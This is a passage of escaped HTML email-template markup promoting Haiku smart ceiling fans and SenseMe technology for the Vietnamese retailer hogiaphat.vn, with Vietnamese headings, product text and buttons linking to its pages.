transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:12px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 0px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 0px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #ef0d33\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #ef0d33;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 10px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong><span style=\\\"font-size: 20px; line-height: 28px;\\\">KH\\u00d4NG CH\\u1ec8 M\\u00c1T - M\\u00c0 C\\u00d2N H\\u01a0N TH\\u1ebe N\\u1eeeA ?<\\/span><\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 30px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #ecf0f1; line-height: 160%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 160%;\\\">C\\u00d4NG NGH\\u1ec6 SENSEME\\u2122<br \\/>B\\u1ed9 n\\u00e3o \\u0111\\u1eb1ng sau nh\\u1eefng chi\\u1ebfc qu\\u1ea1t tr\\u1ea7n th\\u00f4ng minh nh\\u1ea5t th\\u1ebf gi\\u1edbi, c\\u00f4ng ngh\\u1ec7 SenseMe\\u2122 \\u0111\\u01b0\\u1ee3c c\\u1ea5p b\\u1eb1ng s\\u00e1ng ch\\u1ebf, gi\\u00fap b\\u1ea1n tho\\u1ea3i m\\u00e1i t\\u1eeb m\\u1ecdi g\\u00f3c \\u0111\\u1ed9 s\\u1eed d\\u1ee5ng qu\\u1ea1t tr\\u1ea7n.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_button_5\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 30px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/bai-viet\\/senseme\\\" style=\\\"height:57px; v-text-anchor:middle; width:279px;\\\" arcsize=\\\"0%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#1b2a2f\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Rubik\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/bai-viet\\/senseme\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Rubik\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #1b2a2f; border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:20px 30px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">XEM TH\\u00caM C\\u00d4NG NGH\\u00ca SENSEME<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 0px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"298\\\" style=\\\"width: 298px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-49p83\\\" style=\\\"max-width: 320px;min-width: 298.98px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_text_15\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 0px 0px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #db1908; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong>HAIKU - SMART CEILING FANS<\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_16\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #1b2a2f; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 22px; line-height: 30.8px;\\\"><strong>THI\\u1ebeT K\\u1ebe TH\\u1ee6 C\\u00d4NG<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <h3 class=\\\"v-text-align\\\" style=\\\"margin: 0px; color: #236fa1; line-height: 140%; text-align: left; word-wrap: break-word; font-size: 13px; \\\"><strong>MANG \\u0110\\u1ebeN S\\u1ef0 TINH T\\u1ebe THI\\u1ebeT K\\u1ebe T\\u1eeaNG KH\\u00d4NG GIAN<\\/strong><\\/h3>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 30px 10px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #0e0f13; line-height: 160%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 160%;\\\">Haiku v\\u1edbi thi\\u1ebft k\\u1ebf chuy\\u00ean nghi\\u1ec7p ki\\u1ec3m so\\u00e1t hi\\u1ec7u qu\\u1ea3 ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n \\u1edf m\\u1ee9c t\\u1ed1i \\u01b0u t\\u1eebng v\\u00f2ng quay th\\u00f4ng qua c\\u00f4ng ngh\\u1ec7 c\\u1ea3m bi\\u1ebfn\\u00a0<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_button_9\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 14px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"left\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-thong-minh\\\" style=\\\"height:37px; v-text-anchor:middle; width:109px;\\\" arcsize=\\\"0%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#1b2a2f\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Rubik\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-thong-minh\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Rubik\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #1b2a2f; border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">XEM TH\\u00caM<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"301\\\" style=\\\"width: 301px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50p17\\\" style=\\\"max-width: 320px;min-width: 301.02px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678764909825-haiku_caramel_bamboo.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 301.02px;\\\" width=\\\"301.02\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 0px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        